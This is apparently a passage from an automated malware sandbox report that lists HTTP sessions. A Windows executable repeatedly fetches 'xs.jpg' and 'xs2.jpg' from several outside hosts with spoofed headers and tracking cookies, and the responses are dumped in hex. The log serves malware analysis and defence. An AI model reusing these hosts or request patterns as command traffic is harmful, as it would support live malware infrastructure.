                                  33192.168.2.94974544.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:24.626883984 CEST302OUTGET /images/xs.jpg?4c9a32f=401616875 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159281|1720159260|3|6|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:25.142874002 CEST333INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:25 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159285|1720159260|3|7|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  34192.168.2.94974678.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:25.151668072 CEST190OUTGET /xs.jpg?513542c=255458436 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:25.816407919 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:25 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  35192.168.2.94974737.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:25.842606068 CEST203OUTGET /images/xs2.jpg?59e2a88=565509936 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:26.572041035 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:26 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:26.625884056 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:26.849797010 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:26 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:26 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  36192.168.2.94974854.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:27.008203030 CEST308OUTGET /images/xs.jpg?676dbbc=108452796 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159283|1720159259|3|7|0
                                  Jul 5, 2024 08:01:27.757960081 CEST594INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:27 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159287|1720159259|3|8|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  37192.168.2.94974944.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:27.765763998 CEST299OUTGET /xs.jpg?6dcc621=690791622 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159284|1720159259|3|7|0
                                  Jul 5, 2024 08:01:28.279501915 CEST585INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:28 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159288|1720159259|3|8|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  38192.168.2.94975044.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:28.356615067 CEST303OUTGET /images/xs.jpg?7591ee5=1109530125 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159285|1720159260|3|7|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:28.881627083 CEST333INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:28 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159288|1720159260|3|8|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  39192.168.2.94975178.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:28.891998053 CEST191OUTGET /xs.jpg?7ab8dec=1286835000 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:29.544389009 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:29 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  40192.168.2.94975237.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:29.573817015 CEST203OUTGET /images/xs2.jpg?811c5c4=406147404 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:30.290400982 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:30 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:30.291455030 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:30.515683889 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:30 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:30 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  41192.168.2.94975354.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:30.640341997 CEST308OUTGET /images/xs.jpg?8f21b84=600337936 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159287|1720159259|3|8|0
                                  Jul 5, 2024 08:01:31.365442038 CEST594INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:31 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159291|1720159259|3|9|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  42192.168.2.94975444.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:31.374584913 CEST300OUTGET /xs.jpg?96faab4=1108191980 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159288|1720159259|3|8|0
                                  Jul 5, 2024 08:01:31.872354984 CEST585INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:31 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159291|1720159259|3|9|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  43192.168.2.94975544.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:31.881536961 CEST302OUTGET /images/xs.jpg?9b39c81=651063812 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159288|1720159260|3|8|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:32.375207901 CEST333INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:32 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159292|1720159260|3|9|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  44192.168.2.94975678.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:32.384197950 CEST190OUTGET /xs.jpg?a2ff583=854576015 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:33.041765928 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:32 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  45192.168.2.94975737.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:33.065989971 CEST204OUTGET /images/xs2.jpg?a95dff7=1598349231 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:33.802618980 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:33 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
